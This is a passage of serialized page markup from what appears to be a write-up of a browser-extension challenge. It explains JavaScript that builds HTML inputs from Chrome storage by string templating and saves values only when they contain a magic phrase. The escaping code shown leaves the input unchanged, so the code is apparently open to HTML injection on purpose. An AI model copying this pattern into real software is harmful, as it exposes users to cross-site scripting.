data",{"type":33,"tag":128,"props":16283,"children":16284},{"style":676},[16285],{"type":38,"value":6040},{"type":33,"tag":128,"props":16287,"children":16288},{"style":312},[16289],{"type":38,"value":5584},{"type":33,"tag":128,"props":16291,"children":16292},{"style":306},[16293],{"type":38,"value":14251},{"type":33,"tag":128,"props":16295,"children":16296},{"style":312},[16297],{"type":38,"value":5815},{"type":33,"tag":128,"props":16299,"children":16300},{"class":130,"line":1239},[16301,16306],{"type":33,"tag":128,"props":16302,"children":16303},{"style":1576},[16304],{"type":38,"value":16305}," continue",{"type":33,"tag":128,"props":16307,"children":16308},{"style":312},[16309],{"type":38,"value":5676},{"type":33,"tag":128,"props":16311,"children":16312},{"class":130,"line":1251},[16313],{"type":33,"tag":128,"props":16314,"children":16315},{"style":312},[16316],{"type":38,"value":6760},{"type":33,"tag":128,"props":16318,"children":16319},{"class":130,"line":1263},[16320],{"type":33,"tag":128,"props":16321,"children":16322},{"style":312},[16323],{"type":38,"value":845},{"type":33,"tag":128,"props":16325,"children":16326},{"class":130,"line":1276},[16327],{"type":33,"tag":128,"props":16328,"children":16329},{"style":312},[16330],{"type":38,"value":854},{"type":33,"tag":47,"props":16332,"children":16333},{},[16334,16335,16340,16342,16348,16350,16356,16357,16363,16365,16371],{"type":38,"value":2766},{"type":33,"tag":105,"props":16336,"children":16338},{"className":16337},[],[16339],{"type":38,"value":15555},{"type":38,"value":16341}," function take as input the key and value from the chrome storage as well as the outerHTML element of the HTML input element that will be modified.\nIt performs modifications and substitutions using JavaScript's ",{"type":33,"tag":105,"props":16343,"children":16345},{"className":16344},[],[16346],{"type":38,"value":16347},"replace()",{"type":38,"value":16349}," methods and custom templates (",{"type":33,"tag":105,"props":16351,"children":16353},{"className":16352},[],[16354],{"type":38,"value":16355},"{{KEY}}",{"type":38,"value":6345},{"type":33,"tag":105,"props":16358,"children":16360},{"className":16359},[],[16361],{"type":38,"value":16362},"{{VALUE}}",{"type":38,"value":16364},") which will be added via the ",{"type":33,"tag":105,"props":16366,"children":16368},{"className":16367},[],[16369],{"type":38,"value":16370},"getInputTemplateFromOuterHTML()",{"type":38,"value":16372}," function.",{"type":33,"tag":114,"props":16374,"children":16375},{"lang":5526},[16376],{"type":33,"tag":119,"props":16377,"children":16379},{"className":5530,"code":16378,"language":5526,"meta":8,"style":8},"function getInputTemplateFromOuterHTML(outerHTML){\n if (!outerHTML.includes('value=')) {\n outerHTML = outerHTML.replace('>', ' value=\"\">');\n }\n return outerHTML.replace(/name=\".*?\"/, 'name=\"{{KEY}}\"').replace(/value=\".*?\"/, 'value=\"{{VALUE}}\"');\n}\n\nfunction input(key, value, outerHTML) {\n key = key.replace(/\u003C/g, '<').replace(/>/g, '>').replace(/\"/g, '"')\n value = value.replace(/\u003C/g, '<').replace(/>/g, '>').replace(/\"/g, '"')\n const template = getInputTemplateFromOuterHTML(outerHTML);\n return template.replace('{{KEY}}', key).replace('{{VALUE}}', value);\n}\n",[16380],{"type":33,"tag":105,"props":16381,"children":16382},{"__ignoreMap":8},[16383,16408,16462,16525,16532,16658,16665,16672,16715,16869,17021,17053,17132],{"type":33,"tag":128,"props":16384,"children":16385},{"class":130,"line":131},[16386,16390,16395,16399,16403],{"type":33,"tag":128,"props":16387,"children":16388},{"style":300},[16389],{"type":38,"value":13008},{"type":33,"tag":128,"props":16391,"children":16392},{"style":135},[16393],{"type":38,"value":16394}," getInputTemplateFromOuterHTML",{"type":33,"tag":128,"props":16396,"children":16397},{"style":312},[16398],{"type":38,"value":5566},{"type":33,"tag":128,"props":16400,"children":16401},{"style":306},[16402],{"type":38,"value":16154},{"type":33,"tag":128,"props":16404,"children":16405},{"style":312},[16406],{"type":38,"value":16407},"){\n",{"type":33,"tag":128,"props":16409,"children":16410},{"class":130,"line":362},[16411,16416,16420,16425,16429,16433,16437,16441,16445,16450,16454,16458],{"type":33,"tag":128,"props":16412,"children":16413},{"style":1576},[16414],{"type":38,"value":16415}," if",{"type":33,"tag":128,"props":16417,"children":16418},{"style":312},[16419],{"type":38,"value":2852},{"type":33,"tag":128,"props":16421,"children":16422},{"style":300},[16423],{"type":38,"value":16424},"!",{"type":33,"tag":128,"props":16426,"children":16427},{"style":306},[16428],{"type":38,"value":16154},{"type":33,"tag":128,"props":16430,"children":16431},{"style":312},[16432],{"type":38,"value":215},{"type":33,"tag":128,"props":16434,"children":16435},{"style":135},[16436],{"type":38,"value":6957},{"type":33,"tag":128,"props":16438,"children":16439},{"style":312},[16440],{"type":38,"value":5566},{"type":33,"tag":128,"props":16442,"children":16443},{"style":676},[16444],{"type":38,"value":6040},{"type":33,"tag":128,"props":16446,"children":16447},{"style":140},[16448],{"type":38,"value":16449},"value=",{"type":33,"tag":128,"props":16451,"children":16452},{"style":676},[16453],{"type":38,"value":6040},{"type":33,"tag":128,"props":16455,"children":16456},{"style":312},[16457],{"type":38,"value":7088},{"type":33,"tag":128,"props":16459,"children":16460},{"style":312},[16461],{"type":38,"value":762},{"type":33,"tag":128,"props":16463,"children":16464},{"class":130,"line":403},[16465,16470,16474,16479,16483,16488,16492,16496,16500,16504,16508,16512,16517,16521],{"type":33,"tag":128,"props":16466,"children":16467},{"style":306},[16468],{"type":38,"value":16469}," outerHTML",{"type":33,"tag":128,"props":16471,"children":16472},{"style":312},[16473],{"type":38,"value":5657},{"type":33,"tag":128,"props":16475,"children":16476},{"style":306},[16477],{"type":38,"value":16478}," outerHTML",{"type":33,"tag":128,"props":16480,"children":16481},{"style":312},[16482],{"type":38,"value":215},{"type":33,"tag":128,"props":16484,"children":16485},{"style":135},[16486],{"type":38,"value":16487},"replace",{"type":33,"tag":128,"props":16489,"children":16490},{"style":312},[16491],{"type":38,"value":5566},{"type":33,"tag":128,"props":16493,"children":16494},{"style":676},[16495],{"type":38,"value":6040},{"type":33,"tag":128,"props":16497,"children":16498},{"style":140},[16499],{"type":38,"value":6054},{"type":33,"tag":128,"props":16501,"children":16502},{"style":676},[16503],{"type":38,"value":6040},{"type":33,"tag":128,"props":16505,"children":16506},{"style":312},[16507],{"type":38,"value":5584},{"type":33,"tag":128,"props":16509,"children":16510},{"style":676},[16511],{"type":38,"value":6739},{"type":33,"tag":128,"props":16513,"children":16514},{"style":140},[16515],{"type":38,"value":16516}," value=\"\">",{"type":33,"tag":128,"props":16518,"children":16519},{"style":676},[16520],{"type":38,"value":6040},{"type":33,"tag":128,"props":16522,"children":16523},{"style":312},[16524],{"type":38,"value":5815},{"type":33,"tag":128,"props":16526,"children":16527},{"class":130,"line":739},[16528],{"type":33,"tag":128,"props":16529,"children":16530},{"style":312},[16531],{"type":38,"value":845},{"type":33,"tag":128,"props":16533,"children":16534},{"class":130,"line":765},[16535,16539,16543,16547,16551,16555,16559,16565,16570,16575,16579,16583,16587,16591,16596,16600,16604,16608,16612,16616,16621,16625,16629,16633,16637,16641,16645,16650,16654],{"type":33,"tag":128,"props":16536,"children":16537},{"style":1576},[16538],{"type":38,"value":13056},{"type":33,"tag":128,"props":16540,"children":16541},{"style":306},[16542],{"type":38,"value":16478},{"type":33,"tag":128,"props":16544,"children":16545},{"style":312},[16546],{"type":38,"value":215},{"type":33,"tag":128,"props":16548,"children":16549},{"style":135},[16550],{"type":38,"value":16487},{"type":33,"tag":128,"props":16552,"children":16553},{"style":312},[16554],{"type":38,"value":5566},{"type":33,"tag":128,"props":16556,"children":16557},{"style":676},[16558],{"type":38,"value":7367},{"type":33,"tag":128,"props":16560,"children":16562},{"style":16561},"--shiki-default:#C4704F",[16563],{"type":38,"value":16564},"name=\"",{"type":33,"tag":128,"props":16566,"children":16568},{"style":16567},"--shiki-default:#6872AB",[16569],{"type":38,"value":215},{"type":33,"tag":128,"props":16571,"children":16572},{"style":523},[16573],{"type":38,"value":16574},"*?",{"type":33,"tag":128,"props":16576,"children":16577},{"style":16561},[16578],{"type":38,"value":669},{"type":33,"tag":128,"props":16580,"children":16581},{"style":676},[16582],{"type":38,"value":7367},{"type":33,"tag":128,"props":16584,"children":16585},{"style":312},[16586],{"type":38,"value":5584},{"type":33,"tag":128,"props":16588,"children":16589},{"style":676},[16590],{"type":38,"value":6739},{"type":33,"tag":128,"props":16592,"children":16593},{"style":140},[16594],{"type":38,"value":16595},"name=\"{{KEY}}\"",{"type":33,"tag":128,"props":16597,"children":16598},{"style":676},[16599],{"type":38,"value":6040},{"type":33,"tag":128,"props":16601,"children":16602},{"style":312},[16603],{"type":38,"value":6700},{"type":33,"tag":128,"props":16605,"children":16606},{"style":135},[16607],{"type":38,"value":16487},{"type":33,"tag":128,"props":16609,"children":16610},{"style":312},[16611],{"type":38,"value":5566},{"type":33,"tag":128,"props":16613,"children":16614},{"style":676},[16615],{"type":38,"value":7367},{"type":33,"tag":128,"props":16617,"children":16618},{"style":16561},[16619],{"type":38,"value":16620},"value=\"",{"type":33,"tag":128,"props":16622,"children":16623},{"style":16567},[16624],{"type":38,"value":215},{"type":33,"tag":128,"props":16626,"children":16627},{"style":523},[16628],{"type":38,"value":16574},{"type":33,"tag":128,"props":16630,"children":16631},{"style":16561},[16632],{"type":38,"value":669},{"type":33,"tag":128,"props":16634,"children":16635},{"style":676},[16636],{"type":38,"value":7367},{"type":33,"tag":128,"props":16638,"children":16639},{"style":312},[16640],{"type":38,"value":5584},{"type":33,"tag":128,"props":16642,"children":16643},{"style":676},[16644],{"type":38,"value":6739},{"type":33,"tag":128,"props":16646,"children":16647},{"style":140},[16648],{"type":38,"value":16649},"value=\"{{VALUE}}\"",{"type":33,"tag":128,"props":16651,"children":16652},{"style":676},[16653],{"type":38,"value":6040},{"type":33,"tag":128,"props":16655,"children":16656},{"style":312},[16657],{"type":38,"value":5815},{"type":33,"tag":128,"props":16659,"children":16660},{"class":130,"line":804},[16661],{"type":33,"tag":128,"props":16662,"children":16663},{"style":312},[16664],{"type":38,"value":854},{"type":33,"tag":128,"props":16666,"children":16667},{"class":130,"line":839},[16668],{"type":33,"tag":128,"props":16669,"children":16670},{"emptyLinePlaceholder":896},[16671],{"type":38,"value":899},{"type":33,"tag":128,"props":16673,"children":16674},{"class":130,"line":848},[16675,16679,16683,16687,16691,16695,16699,16703,16707,16711],{"type":33,"tag":128,"props":16676,"children":16677},{"style":300},[16678],{"type":38,"value":13008},{"type":33,"tag":128,"props":16680,"children":16681},{"style":135},[16682],{"type":38,"value":16183},{"type":33,"tag":128,"props":16684,"children":16685},{"style":312},[16686],{"type":38,"value":5566},{"type":33,"tag":128,"props":16688,"children":16689},{"style":306},[16690],{"type":38,"value":13022},{"type":33,"tag":128,"props":16692,"children":16693},{"style":312},[16694],{"type":38,"value":5584},{"type":33,"tag":128,"props":16696,"children":16697},{"style":306},[16698],{"type":38,"value":13031},{"type":33,"tag":128,"props":16700,"children":16701},{"style":312},[16702],{"type":38,"value":5584},{"type":33,"tag":128,"props":16704,"children":16705},{"style":306},[16706],{"type":38,"value":16478},{"type":33,"tag":128,"props":16708,"children":16709},{"style":312},[16710],{"type":38,"value":2966},{"type":33,"tag":128,"props":16712,"children":16713},{"style":312},[16714],{"type":38,"value":762},{"type":33,"tag":128,"props":16716,"children":16717},{"class":130,"line":976},[16718,16723,16727,16731,16735,16739,16743,16747,16751,16755,16760,16764,16768,16772,16776,16780,16784,16788,16792,16796,16800,16804,16808,16812,16817,16821,16825,16829,16833,16837,16841,16845,16849,16853,16857,16861,16865],{"type":33,"tag":128,"props":16719,"children":16720},{"style":306},[16721],{"type":38,"value":16722}," key",{"type":33,"tag":128,"props":16724,"children":16725},{"style":312},[16726],{"type":38,"value":5657},{"type":33,"tag":128,"props":16728,"children":16729},{"style":306},[16730],{"type":38,"value":5027},{"type":33,"tag":128,"props":16732,"children":16733},{"style":312},[16734],{"type":38,"value":215},{"type":33,"tag":128,"props":16736,"children":16737},{"style":135},[16738],{"type":38,"value":16487},{"type":33,"tag":128,"props":16740,"children":16741},{"style":312},[16742],{"type":38,"value":5566},{"type":33,"tag":128,"props":16744,"children":16745},{"style":676},[16746],{"type":38,"value":7367},{"type":33,"tag":128,"props":16748,"children":16749},{"style":16561},[16750],{"type":38,"value":5977},{"type":33,"tag":128,"props":16752,"children":16753},{"style":676},[16754],{"type":38,"value":7367},{"type":33,"tag":128,"props":16756,"children":16757},{"style":1576},[16758],{"type":38,"value":16759},"g",{"type":33,"tag":128,"props":16761,"children":16762},{"style":312},[16763],{"type":38,"value":5584},{"type":33,"tag":128,"props":16765,"children":16766},{"style":676},[16767],{"type":38,"value":6739},{"type":33,"tag":128,"props":16769,"children":16770},{"style":140},[16771],{"type":38,"value":6351},{"type":33,"tag":128,"props":16773,"children":16774},{"style":676},[16775],{"type":38,"value":6040},{"type":33,"tag":128,"props":16777,"children":16778},{"style":312},[16779],{"type":38,"value":6700},{"type":33,"tag":128,"props":16781,"children":16782},{"style":135},[16783],{"type":38,"value":16487},{"type":33,"tag":128,"props":16785,"children":16786},{"style":312},[16787],{"type":38,"value":5566},{"type":33,"tag":128,"props":16789,"children":16790},{"style":676},[16791],{"type":38,"value":7367},{"type":33,"tag":128,"props":16793,"children":16794},{"style":16561},[16795],{"type":38,"value":6054},{"type":33,"tag":128,"props":16797,"children":16798},{"style":676},[16799],{"type":38,"value":7367},{"type":33,"tag":128,"props":16801,"children":16802},{"style":1576},[16803],{"type":38,"value":16759},{"type":33,"tag":128,"props":16805,"children":16806},{"style":312},[16807],{"type":38,"value":5584},{"type":33,"tag":128,"props":16809,"children":16810},{"style":676},[16811],{"type":38,"value":6739},{"type":33,"tag":128,"props":16813,"children":16814},{"style":140},[16815],{"type":38,"value":16816},">",{"type":33,"tag":128,"props":16818,"children":16819},{"style":676},[16820],{"type":38,"value":6040},{"type":33,"tag":128,"props":16822,"children":16823},{"style":312},[16824],{"type":38,"value":6700},{"type":33,"tag":128,"props":16826,"children":16827},{"style":135},[16828],{"type":38,"value":16487},{"type":33,"tag":128,"props":16830,"children":16831},{"style":312},[16832],{"type":38,"value":5566},{"type":33,"tag":128,"props":16834,"children":16835},{"style":676},[16836],{"type":38,"value":7367},{"type":33,"tag":128,"props":16838,"children":16839},{"style":16561},[16840],{"type":38,"value":669},{"type":33,"tag":128,"props":16842,"children":16843},{"style":676},[16844],{"type":38,"value":7367},{"type":33,"tag":128,"props":16846,"children":16847},{"style":1576},[16848],{"type":38,"value":16759},{"type":33,"tag":128,"props":16850,"children":16851},{"style":312},[16852],{"type":38,"value":5584},{"type":33,"tag":128,"props":16854,"children":16855},{"style":676},[16856],{"type":38,"value":6739},{"type":33,"tag":128,"props":16858,"children":16859},{"style":140},[16860],{"type":38,"value":6359},{"type":33,"tag":128,"props":16862,"children":16863},{"style":676},[16864],{"type":38,"value":6040},{"type":33,"tag":128,"props":16866,"children":16867},{"style":312},[16868],{"type":38,"value":2427},{"type":33,"tag":128,"props":16870,"children":16871},{"class":130,"line":988},[16872,16877,16881,16885,16889,16893,16897,16901,16905,16909,16913,16917,16921,16925,16929,16933,16937,16941,16945,16949,16953,16957,16961,16965,16969,16973,16977,16981,16985,16989,16993,16997,17001,17005,17009,17013,17017],{"type":33,"tag":128,"props":16873,"children":16874},{"style":306},[16875],{"type":38,"value":16876}," value",{"type":33,"tag":128,"props":16878,"children":16879},{"style":312},[16880],{"type":38,"value":5657},{"type":33,"tag":128,"props":16882,"children":16883},{"style":306},[16884],{"type":38,"value":13031},{"type":33,"tag":128,"props":16886,"children":16887},{"style":312},[16888],{"type":38,"value":215},{"type":33,"tag":128,"props":16890,"children":16891},{"style":135},[16892],{"type":38,"value":16487},{"type":33,"tag":128,"props":16894,"children":16895},{"style":312},[16896],{"type":38,"value":5566},{"type":33,"tag":128,"props":16898,"children":16899},{"style":676},[16900],{"type":38,"value":7367},{"type":33,"tag":128,"props":16902,"children":16903},{"style":16561},[16904],{"type":38,"value":5977},{"type":33,"tag":128,"props":16906,"children":16907},{"style":676},[16908],{"type":38,"value":7367},{"type":33,"tag":128,"props":16910,"children":16911},{"style":1576},[16912],{"type":38,"value":16759},{"type":33,"tag":128,"props":16914,"children":16915},{"style":312},[16916],{"type":38,"value":5584},{"type":33,"tag":128,"props":16918,"children":16919},{"style":676},[16920],{"type":38,"value":6739},{"type":33,"tag":128,"props":16922,"children":16923},{"style":140},[16924],{"type":38,"value":6351},{"type":33,"tag":128,"props":16926,"children":16927},{"style":676},[16928],{"type":38,"value":6040},{"type":33,"tag":128,"props":16930,"children":16931},{"style":312},[16932],{"type":38,"value":6700},{"type":33,"tag":128,"props":16934,"children":16935},{"style":135},[16936],{"type":38,"value":16487},{"type":33,"tag":128,"props":16938,"children":16939},{"style":312},[16940],{"type":38,"value":5566},{"type":33,"tag":128,"props":16942,"children":16943},{"style":676},[16944],{"type":38,"value":7367},{"type":33,"tag":128,"props":16946,"children":16947},{"style":16561},[16948],{"type":38,"value":6054},{"type":33,"tag":128,"props":16950,"children":16951},{"style":676},[16952],{"type":38,"value":7367},{"type":33,"tag":128,"props":16954,"children":16955},{"style":1576},[16956],{"type":38,"value":16759},{"type":33,"tag":128,"props":16958,"children":16959},{"style":312},[16960],{"type":38,"value":5584},{"type":33,"tag":128,"props":16962,"children":16963},{"style":676},[16964],{"type":38,"value":6739},{"type":33,"tag":128,"props":16966,"children":16967},{"style":140},[16968],{"type":38,"value":16816},{"type":33,"tag":128,"props":16970,"children":16971},{"style":676},[16972],{"type":38,"value":6040},{"type":33,"tag":128,"props":16974,"children":16975},{"style":312},[16976],{"type":38,"value":6700},{"type":33,"tag":128,"props":16978,"children":16979},{"style":135},[16980],{"type":38,"value":16487},{"type":33,"tag":128,"props":16982,"children":16983},{"style":312},[16984],{"type":38,"value":5566},{"type":33,"tag":128,"props":16986,"children":16987},{"style":676},[16988],{"type":38,"value":7367},{"type":33,"tag":128,"props":16990,"children":16991},{"style":16561},[16992],{"type":38,"value":669},{"type":33,"tag":128,"props":16994,"children":16995},{"style":676},[16996],{"type":38,"value":7367},{"type":33,"tag":128,"props":16998,"children":16999},{"style":1576},[17000],{"type":38,"value":16759},{"type":33,"tag":128,"props":17002,"children":17003},{"style":312},[17004],{"type":38,"value":5584},{"type":33,"tag":128,"props":17006,"children":17007},{"style":676},[17008],{"type":38,"value":6739},{"type":33,"tag":128,"props":17010,"children":17011},{"style":140},[17012],{"type":38,"value":6359},{"type":33,"tag":128,"props":17014,"children":17015},{"style":676},[17016],{"type":38,"value":6040},{"type":33,"tag":128,"props":17018,"children":17019},{"style":312},[17020],{"type":38,"value":2427},{"type":33,"tag":128,"props":17022,"children":17023},{"class":130,"line":1001},[17024,17028,17033,17037,17041,17045,17049],{"type":33,"tag":128,"props":17025,"children":17026},{"style":300},[17027],{"type":38,"value":5637},{"type":33,"tag":128,"props":17029,"children":17030},{"style":306},[17031],{"type":38,"value":17032}," template",{"type":33,"tag":128,"props":17034,"children":17035},{"style":312},[17036],{"type":38,"value":5657},{"type":33,"tag":128,"props":17038,"children":17039},{"style":135},[17040],{"type":38,"value":16394},{"type":33,"tag":128,"props":17042,"children":17043},{"style":312},[17044],{"type":38,"value":5566},{"type":33,"tag":128,"props":17046,"children":17047},{"style":306},[17048],{"type":38,"value":16154},{"type":33,"tag":128,"props":17050,"children":17051},{"style":312},[17052],{"type":38,"value":5815},{"type":33,"tag":128,"props":17054,"children":17055},{"class":130,"line":1014},[17056,17060,17064,17068,17072,17076,17080,17084,17088,17092,17096,17100,17104,17108,17112,17116,17120,17124,17128],{"type":33,"tag":128,"props":17057,"children":17058},{"style":1576},[17059],{"type":38,"value":13056},{"type":33,"tag":128,"props":17061,"children":17062},{"style":306},[17063],{"type":38,"value":17032},{"type":33,"tag":128,"props":17065,"children":17066},{"style":312},[17067],{"type":38,"value":215},{"type":33,"tag":128,"props":17069,"children":17070},{"style":135},[17071],{"type":38,"value":16487},{"type":33,"tag":128,"props":17073,"children":17074},{"style":312},[17075],{"type":38,"value":5566},{"type":33,"tag":128,"props":17077,"children":17078},{"style":676},[17079],{"type":38,"value":6040},{"type":33,"tag":128,"props":17081,"children":17082},{"style":140},[17083],{"type":38,"value":16355},{"type":33,"tag":128,"props":17085,"children":17086},{"style":676},[17087],{"type":38,"value":6040},{"type":33,"tag":128,"props":17089,"children":17090},{"style":312},[17091],{"type":38,"value":5584},{"type":33,"tag":128,"props":17093,"children":17094},{"style":306},[17095],{"type":38,"value":5027},{"type":33,"tag":128,"props":17097,"children":17098},{"style":312},[17099],{"type":38,"value":6700},{"type":33,"tag":128,"props":17101,"children":17102},{"style":135},[17103],{"type":38,"value":16487},{"type":33,"tag":128,"props":17105,"children":17106},{"style":312},[17107],{"type":38,"value":5566},{"type":33,"tag":128,"props":17109,"children":17110},{"style":676},[17111],{"type":38,"value":6040},{"type":33,"tag":128,"props":17113,"children":17114},{"style":140},[17115],{"type":38,"value":16362},{"type":33,"tag":128,"props":17117,"children":17118},{"style":676},[17119],{"type":38,"value":6040},{"type":33,"tag":128,"props":17121,"children":17122},{"style":312},[17123],{"type":38,"value":5584},{"type":33,"tag":128,"props":17125,"children":17126},{"style":306},[17127],{"type":38,"value":13031},{"type":33,"tag":128,"props":17129,"children":17130},{"style":312},[17131],{"type":38,"value":5815},{"type":33,"tag":128,"props":17133,"children":17134},{"class":130,"line":1026},[17135],{"type":33,"tag":128,"props":17136,"children":17137},{"style":312},[17138],{"type":38,"value":854},{"type":33,"tag":47,"props":17140,"children":17141},{},[17142,17144,17150],{"type":38,"value":17143},"The save function will listen for the change event of each input to update the chrome storage via the tag name of each input. It will be absolutely necessary that the string to be updated contains ",{"type":33,"tag":105,"props":17145,"children":17147},{"className":17146},[],[17148],{"type":38,"value":17149},"shikanoko nokonoko koshitantan",{"type":38,"value":17151}," for the storage to be updated.",{"type":33,"tag":114,"props":17153,"children":17154},{"lang":5526},[17155],{"type":33,"tag":119,"props":17156,"children":17158},{"className":5530,"code":17157,"language":5526,"meta":8,"style":8},"\nfunction save(data) {\n return new Promise((resolve) => {\n chrome.runtime.sendMessage(\n {\n type: 'SAVE',\n payload: data,\n },\n response => {\n resolve(response);\n }\n );\n })\n}\n\nasync function saves() {\n var inputs = document.querySelectorAll('input');\n for (const input of inputs) {\n input.addEventListener('change', async function (event) {\n const key = event.target.name;\n const value = event.target.value;\n if (!value.includes(\"shikanoko nokonoko koshitantan\")){\n return\n }\n try {\n await save({ key, value });\n console.log('Data saved');\n } catch (error) {\n console.log('Error saving data', error);\n }\n });\n }\n}\n",[17159],{"type":33,"tag":105,"props":17160,"children":17161},{"__ignoreMap":8},[17162,17169,17196,17231,17258,17265,17292,17311,17318,17333,17352,17359,17366,17373,17380,17387,17410,17457,17492,17555,17597,17636,17684,17692,17699,17711,17743,17779,17807,17851,17858,17865,17872],{"type":33,"tag":128,"props":17163,"children":17164},{"class":130,"line":131},[17165],{"type":33,"tag":128,"props":17166,"children":17167},{"emptyLinePlaceholder":896},[17168],{"type":38,"value":899},{"type":33,"tag":128,"props":17170,"children":17171},{"class":130,"line":362},[17172,17176,17180,17184,17188,17192],{"type":33,"tag":128,"props":17173,"children":17174},{"style":300},[17175],{"type":38,"value":13008},{"type":33,"tag":128,"props":17177,"children":17178},{"style":135},[17179],{"type":38,"value":13013},{"type":33,"tag":128,"props":17181,"children":17182},{"style":312},[17183],{"type":38,"value":5566},{"type":33,"tag":128,"props":17185,"children":17186},{"style":306},[17187],{"type":38,"value":2815},{"type":33,"tag":128,"props":17189,"children":17190},{"style":312},[17191],{"type":38,"value":2966},{"type":33,"tag":128,"props":17193,"children":17194},{"style":312},[17195],{"type":38,"value":762},{"type":33,"tag":128,"props":17197,"children":17198},{"class":130,"line":403},[17199,17203,17207,17211,17215,17219,17223,17227],{"type":33,"tag":128,"props":17200,"children":17201},{"style":1576},[17202],{"type":38,"value":13056},{"type":33,"tag":128,"props":17204,"children":17205},{"style":300},[17206],{"type":38,"value":13061},{"type":33,"tag":128,"props":17208,"children":17209},{"style":437},[17210],{"type":38,"value":13066},{"type":33,"tag":128,"props":17212,"children":17213},{"style":312},[17214],{"type":38,"value":13071},{"type":33,"tag":128,"props":17216,"children":17217},{"style":306},[17218],{"type":38,"value":13076},{"type":33,"tag":128,"props":17220,"children":17221},{"style":312},[17222],{"type":38,"value":2966},{"type":33,"tag":128,"props":17224,"children":17225},{"style":312},[17226],{"type":38,"value":5625},{"type":33,"tag":128,"props":17228,"children":17229},{"style":312},[17230],{"type":38,"value":762},{"type":33,"tag":128,"props":17232,"children":17233},{"class":130,"line":739},[17234,17238,17242,17246,17250,17254],{"type":33,"tag":128,"props":17235,"children":17236},{"style":306},[17237],{"type":38,"value":13202},{"type":33,"tag":128,"props":17239,"children":17240},{"style":312},[17241],{"type":38,"value":215},{"type":33,"tag":128,"props":17243,"children":17244},{"style":306},[17245],{"type":38,"value":13784},{"type":33,"tag":128,"props":17247,"children":17248},{"style":312},[17249],{"type":38,"value":215},{"type":33,"tag":128,"props":17251,"children":17252},{"style":135},[17253],{"type":38,"value":15668},{"type":33,"tag":128,"props":17255,"children":17256},{"style":312},[17257],{"type":38,"value":15673},{"type":33,"tag":128,"props":17259,"children":17260},{"class":130,"line":765},[17261],{"type":33,"tag":128,"props":17262,"children":17263},{"style":312},[17264],{"type":38,"value":15681},{"type":33,"tag":128,"props":17266,"children":17267},{"class":130,"line":804},[17268,17272,17276,17280,17284,17288],{"type":33,"tag":128,"props":17269,"children":17270},{"style":437},[17271],{"type":38,"value":15689},{"type":33,"tag":128,"props":17273,"children":17274},{"style":312},[17275],{"type":38,"value":284},{"type":33,"tag":128,"props":17277,"children":17278},{"style":676},[17279],{"type":38,"value":6739},{"type":33,"tag":128,"props":17281,"children":17282},{"style":140},[17283],{"type":38,"value":14091},{"type":33,"tag":128,"props":17285,"children":17286},{"style":676},[17287],{"type":38,"value":6040},{"type":33,"tag":128,"props":17289,"children":17290},{"style":312},[17291],{"type":38,"value":693},{"type":33,"tag":128,"props":17293,"children":17294},{"class":130,"line":839},[17295,17299,17303,17307],{"type":33,"tag":128,"props":17296,"children":17297},{"style":437},[17298],{"type":38,"value":15717},{"type":33,"tag":128,"props":17300,"children":17301},{"style":312},[17302],{"type":38,"value":284},{"type":33,"tag":128,"props":17304,"children":17305},{"style":306},[17306],{"type":38,"value":13545},{"type":33,"tag":128,"props":17308,"children":17309},{"style":312},[17310],{"type":38,"value":693},{"type":33,"tag":128,"props":17312,"children":17313},{"class":130,"line":848},[17314],{"type":33,"tag":128,"props":17315,"children":17316},{"style":312},[17317],{"type":38,"value":15742},{"type":33,"tag":128,"props":17319,"children":17320},{"class":130,"line":976},[17321,17325,17329],{"type":33,"tag":128,"props":17322,"children":17323},{"style":306},[17324],{"type":38,"value":15750},{"type":33,"tag":128,"props":17326,"children":17327},{"style":312},[17328],{"type":38,"value":5625},{"type":33,"tag":128,"props":17330,"children":17331},{"style":312},[17332],{"type":38,"value":762},{"type":33,"tag":128,"props":17334,"children":17335},{"class":130,"line":988},[17336,17340,17344,17348],{"type":33,"tag":128,"props":17337,"children":17338},{"style":135},[17339],{"type":38,"value":15836},{"type":33,"tag":128,"props":17341,"children":17342},{"style":312},[17343],{"type":38,"value":5566},{"type":33,"tag":128,"props":17345,"children":17346},{"style":306},[17347],{"type":38,"value":14194},{"type":33,"tag":128,"props":17349,"children":17350},{"style":312},[17351],{"type":38,"value":5815},{"type":33,"tag":128,"props":17353,"children":17354},{"class":130,"line":1001},[17355],{"type":33,"tag":128,"props":17356,"children":17357},{"style":312},[17358],{"type":38,"value":13656},{"type":33,"tag":128,"props":17360,"children":17361},{"class":130,"line":1014},[17362],{"type":33,"tag":128,"props":17363,"children":17364},{"style":312},[17365],{"type":38,"value":15863},{"type":33,"tag":128,"props":17367,"children":17368},{"class":130,"line":1026},[17369],{"type":33,"tag":128,"props":17370,"children":17371},{"style":312},[17372],{"type":38,"value":13321},{"type":33,"tag":128,"props":17374,"children":17375},{"class":130,"line":1038},[17376],{"type":33,"tag":128,"props":17377,"children":17378},{"style":312},[17379],{"type":38,"value":854},{"type":33,"tag":128,"props":17381,"children":17382},{"class":130,"line":1051},[17383],{"type":33,"tag":128,"props":17384,"children":17385},{"emptyLinePlaceholder":896},[17386],{"type":38,"value":899},{"type":33,"tag":128,"props":17388,"children":17389},{"class":130,"line":1063},[17390,17394,17398,17402,17406],{"type":33,"tag":128,"props":17391,"children":17392},{"style":300},[17393],{"type":38,"value":13862},{"type":33,"tag":128,"props":17395,"children":17396},{"style":300},[17397],{"type":38,"value":15428},{"type":33,"tag":128,"props":17399,"children":17400},{"style":135},[17401],{"type":38,"value":15508},{"type":33,"tag":128,"props":17403,"children":17404},{"style":312},[17405],{"type":38,"value":9376},{"type":33,"tag":128,"props":17407,"children":17408},{"style":312},[17409],{"type":38,"value":762},{"type":33,"tag":128,"props":17411,"children":17412},{"class":130,"line":1076},[17413,17417,17421,17425,17429,17433,17437,17441,17445,17449,17453],{"type":33,"tag":128,"props":17414,"children":17415},{"style":300},[17416],{"type":38,"value":15915},{"type":33,"tag":128,"props":17418,"children":17419},{"style":306},[17420],{"type":38,"value":15920},{"type":33,"tag":128,"props":17422,"children":17423},{"style":312},[17424],{"type":38,"value":5657},{"type":33,"tag":128,"props":17426,"children":17427},{"style":306},[17428],{"type":38,"value":7562},{"type":33,"tag":128,"props":17430,"children":17431},{"style":312},[17432],{"type":38,"value":215},{"type":33,"tag":128,"props":17434,"children":17435},{"style":135},[17436],{"type":38,"value":7806},{"type":33,"tag":128,"props":17438,"children":17439},{"style":312},[17440],{"type":38,"value":5566},{"type":33,"tag":128,"props":17442,"children":17443},{"style":676},[17444],{"type":38,"value":6040},{"type":33,"tag":128,"props":17446,"children":17447},{"style":140},[17448],{"type":38,"value":14882},{"type":33,"tag":128,"props":17450,"children":17451},{"style":676},[17452],{"type":38,"value":6040},{"type":33,"tag"